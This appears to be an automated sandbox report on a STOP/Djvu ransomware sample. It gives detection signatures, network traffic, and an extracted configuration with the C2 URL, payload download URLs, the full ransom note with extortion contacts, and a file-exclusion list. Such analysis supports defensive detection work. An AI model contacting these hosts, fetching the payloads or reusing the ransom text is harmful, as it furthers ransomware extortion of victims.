2.0.bE5aaTiJM0.exe.400000.9.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.bE5aaTiJM0.exe.400000.9.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.0.bE5aaTiJM0.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.bE5aaTiJM0.exe.400000.4.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.bE5aaTiJM0.exe.400000.4.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.bE5aaTiJM0.exe.400000.4.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 328 entries

Snort Signatures

ETPRO TROJAN STOP Ransomware CnC Activity - Source IP: 192.168.2.6 - Destination IP: 58.235.189.192

Timestamp:	192.168.2.658.235.189.19249782802833438 08/05/22-11:22:58.893846
SID:	2833438
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 58.235.189.192 - Destination IP: 192.168.2.6

Timestamp:	58.235.189.192192.168.2.680497822036335 08/05/22-11:22:59.718335
SID:	2036335
Source Port:	80
Destination Port:	49782
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: bE5aaTiJM0.exe	Virustotal: Detection: 39%			Perma Link
Source: bE5aaTiJM0.exe	ReversingLabs: Detection: 53%

Antivirus detection for URL or domain

Source: http://acacaca.org/test2/get.php	Avira URL Cloud: Label: malware
Source: http://acacaca.org/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: acacaca.org	Virustotal: Detection: 17%			Perma Link
Source: http://acacaca.org/test2/get.php	Virustotal: Detection: 18%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe

ReversingLabs: Detection: 53%

Machine Learning detection for sample

Source: bE5aaTiJM0.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe

Joe Sandbox ML: detected

Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack

Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\W

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,		2_2_0040EAA0
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,		2_2_00410FC0

Source: bE5aaTiJM0.exe, 0000000C.00000003.618061651.00000000008E3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: bE5aaTiJM0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49781 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: bE5aaTiJM0.exe, bE5aaTiJM0.exe, 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\xat\100\fahunisu_kuxuse\wuce97-sibemudex.pdb source: bE5aaTiJM0.exe, bE5aaTiJM0.exe.2.dr
Source:	Binary string: AC:\xat\100\fahunisu_kuxuse\wuce97-sibemudex.pdb` source: bE5aaTiJM0.exe, bE5aaTiJM0.exe.2.dr
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: bE5aaTiJM0.exe, 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,

2_2_0040F730

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.6:49782 -> 58.235.189.192:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 58.235.189.192:80 -> 192.168.2.6:49782

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://acacaca.org/test2/get.php

Source: Joe Sandbox View

ASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 162.0.217.254 162.0.217.254
Source: Joe Sandbox View	IP Address: 58.235.189.192 58.235.189.192

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: bE5aaTiJM0.exe, 0000000C.00000003.540809343.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bE5aaTiJM0.exe, 0000000C.00000003.545804124.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: bE5aaTiJM0.exe, 0000000C.00000003.547069468.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.618033363.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acacaca.org/test2/get.php
Source: bE5aaTiJM0.exe, 0000000C.00000003.617951064.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acacaca.org/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
Source: bE5aaTiJM0.exe, 0000000B.00000002.436291517.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617951064.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bE5aaTiJM0.exe, 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: bE5aaTiJM0.exe, 0000000C.00000003.538674983.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: bE5aaTiJM0.exe, 0000000C.00000003.542183889.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: bE5aaTiJM0.exe, 0000000C.00000003.543541001.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: bE5aaTiJM0.exe, 0000000C.00000003.544406916.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: bE5aaTiJM0.exe, 0000000C.00000003.545161091.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: bE5aaTiJM0.exe, 0000000C.00000003.545804124.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: bE5aaTiJM0.exe, 0000000C.00000003.546297954.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: bE5aaTiJM0.exe, 0000000C.00000003.547069468.00000000033C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: bE5aaTiJM0.exe, 0000000C.00000003.617951064.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/A
Source: bE5aaTiJM0.exe, 0000000B.00000002.436291517.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/S
Source: bE5aaTiJM0.exe, 0000000B.00000002.436291517.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/U
Source: bE5aaTiJM0.exe, 0000000B.00000002.436219532.0000000000778000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617951064.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619018447.0000000000848000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonG
Source: bE5aaTiJM0.exe, 0000000B.00000002.436250212.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonJ
Source: bE5aaTiJM0.exe, 0000000B.00000002.436219532.0000000000778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsondllZ
Source: bE5aaTiJM0.exe, 0000000B.00000002.436250212.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonj
Source: bE5aaTiJM0.exe, 0000000C.00000003.617923119.0000000000909000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619591429.0000000000909000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://we.tl/t-QsoSRIeA
Source: bE5aaTiJM0.exe, 0000000C.00000002.619614591.0000000000914000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619400903.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.618130988.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617889344.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617644288.0000000000914000.00000004.00000020.00020000.00000000.sdmp, _readme.txt.12.dr, _readme.txt0.12.dr	String found in binary or memory: https://we.tl/t-QsoSRIeAK6

Source: unknown

DNS traffic detected: queries for: api.2ip.ua

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: acacaca.org

Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49781 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_readme.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-QsoSRIeAK6Price of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@bestyourmail.chReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0531Jhyjd0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA

Jump to dropped file

Yara detected Djvu Ransomware

Source: Yara match	File source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE
